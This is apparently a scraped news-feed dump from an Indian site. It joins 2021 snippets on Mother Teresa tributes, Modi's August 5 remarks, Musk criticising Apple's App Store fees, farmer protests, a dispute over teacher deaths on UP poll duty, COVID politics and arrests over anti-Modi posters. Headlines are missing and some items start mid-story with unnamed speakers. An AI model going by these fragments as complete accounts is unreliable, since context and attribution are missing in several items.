The leading child rights organization responded to Twitter’s complaint officer, saying it had received a report about Kamra posting a “doctored” video of a youngster performing a patriotic song to promote his own political objectives.

]]>She was loved and respected by people all over the world who also called her Saint Teresa.
Mother Teresa was born on August 26, 1910, in Skopje, the capital of the Republic of Macedonia. She was baptised Agnes Gonxha Bojaxhiu. Mother Teresa decided to stay in India after a visit to Kolkata, West Bengal, where she was moved by the condition of the underprivileged. She devoted her life to helping the sick and poor.
Remembering her services to humanity, Union minister Hardeep Singh Puri tweeted, “Remembering Bharat Ratna & Nobel Laureate Mother Teresa Ji on her birth anniversary. She established ‘Nirmal Hriday’ & dedicated her life to the service of humanity.”
Delhi Chief Minister Arvind Kejriwal in his tribute to Mother Teresa wrote, “After working for Tata Steel, I volunteered at Mother Teresa’s ashram in Kalighat. It was a spiritual experience that inspired me to be in service of humanity for life. On her birth anniversary, I join the millions whose lives she touched to remember her.”
“Humble tributes to #MotherTeresa on her birth anniversary. Her life was dedicated to serving the poor, destitute and sick. Her compassion and selfless service for the welfare of mankind shall always remain an inspiration,” wrote Rajasthan Chief Minister Ashok Gehlot.
The official Twitter account of the Indian National Congress remembered Mother Teresa’s “noble work and contributions to uplift the lives of all those in need”
The tribute from Governor of Odisha Ganeshi Lal’s official Twitter account read, “Hon’ble Governor pays his humble tribute to Nobel laureate & Bharat Ratna MotherTeresa, on her birth anniversary. She will always be remembered by all for her selfless and dedicated service towards the poor and underprivileged.”
Mother Teresa died on September 5, 1997. On September 4, 2016, she was declared a saint by Pope Francis at a ceremony at the Vatican.

]]>The post August 5 will be remembered in history : PM Modi appeared first on The Edge Media.
]]>He listed three significant developments in recent history – the abrogation of Article 370 from Jammu and Kashmir in 2019, the foundation-laying ceremony for the construction of a Ram Temple in Ayodhya on August 5 last year, and the Indian men’s hockey team’s win over Germany today – to signify the importance of August 5.
He said the date has once again brought happiness and excitement to the people.
“Two years ago on this day, Article 370 was abrogated in Jammu and Kashmir. On this day last year, the first step was taken towards the construction of the Ram Temple in Ayodhya. Today, construction of a grand Ram Temple is underway”, said PM Modi.

“New India is gaining global recognition not through ranks, but by winning medals. It has been proved that one’s progress is decided by hard work, not family. Indian youth is moving forward, it’s progressing,” PM Modi added.

PM said this during his interaction with beneficiaries of the scheme through video-conferencing as the state observed the Pradhan Mantri Garib Kalyan Yojana Day.
Earlier in the day, PM Modi lauded the hard work of the Indian men’s hockey team and its Australian coach Graham Reid during a telephonic conversation with skipper Manpreet Singh and the support staff after the team’s bronze medal win at the Olympic Games.

]]>“Apple app store fees are a de facto global tax on the Internet. Epic is right,” Musk said in a tweet.

The issue came to focus after Epic Games, the maker of ‘Fortnite’, alleged that the iPhone maker has abused its dominance in the market for mobile apps. It even filed a lawsuit against Apple last year.
Epic broke Apple’s rules when it introduced its own in-app payment system in ‘Fortnite’ to circumvent Apple’s commissions. The tech giant subsequently removed the game from its app store.
Apple has so far not responded to the development, but the company has defended its app store practices both in court and to lawmakers in hearings.
“Actually, I like & use Apple products. They are just obviously overcharging with App Store. I mean 30% fees for doing almost zero incremental work is completely unreasonable. Epic wouldn’t bother processing their own payments if App Store fees were fair,” he further said on Twitter.
“Normally, competitive pressure would force Apple to lower fees, but Apple & Android have a duopoly on phones. When interface familiarity is taken into account, it’s basically a monopoly,” the Tesla CEO said while replying to a user on Twitter.

He also called on the farmers to be united “to save the soul and freedom of India”.
Tikait’s comments came on the third day of farmers’ protest near Parliament where monsoon session is being held. The sit-in, which the protesters call ‘Kisan Sansad’ began at Jantar Mantar on Thursday amid heavy security.

Adding to this, he said,”The BJP government is creating a world of big lies. How would the heartless BJP members realise the grief to these families?”. He also put up a newspaper story in support of his statement.

The president of Prathmik Shiksha Sangha, Dinesh Chandra Sharma had earlier issued a report which shows the death of 1,621 teachers and workers, since the first week of April. Out of the total numbers, 90% were on the panchayat election duty. Mr. Yadav is also demanding that the families must be paid Rs. 1 crore each for the loss.
On the other hand, the UP state Minister for basic education, Satish Chandra Dwivedi argued the statement. He said that according to the government data, only three teachers have died on the poll duty. All these deaths cannot be accredited to the elections.

]]>He tweeted in Hindi,”The new form of Corona that came to Singapore is being said to be extremely dangerous for children, in India it may come as a third wave. My appeal to the central government: 1. Air services with Singapore to be cancelled with immediate effect 2. Priority on vaccine options should be worked out for children too”.
Arvind Kejriwal (@ArvindKejriwal) May 18, 2021
Delhi Chief Minister’s tweet came in the middle of the concerns raised about the third wave of Corona. Many experts say that this is very likely to target the children. At the current time, the first and second wave has hit the elderly and the young at most.
The Principal Scientific Advisor of the government informed that a third wave in ‘inevitable’ and advised that the vaccines must be updated to deal with the new strains.

Minimum of 17 people were arrested by the Delhi police for putting up the posters that criticised the Prime Minister Narendra Modi’s hadling of the coronavirus pandemic.
According to an ANI report, the Delhi Police which reports to the Union Home Ministry, said that it had also registered approximately 21 cases against the Defacement of Public Property Act and Section 188 in the matter.
India has already reported more that 3 lakh infections in a day over the past few weeks which has overburdened its healthcare system and has left many patients without hospital beds, oxygen and appropriate treatment.
Several other leaders have also criticised these arrests saying that it indicates a “lawless state of gone amuck”.
Am shocked &stunned. May vehemently disagree bt under what authority, what law, wht power can U arrest those who put up posters eg auto driver, printer, daily wager etc. This, like UP arrest of person who complained on losing his father, smacks of a lawless state gone amuck!

Putting up critical posters against PM is now a crime? Is India run by the Modi Penal Code now? Is the Delhi Police so jobless in the middle of a raging pandemic??
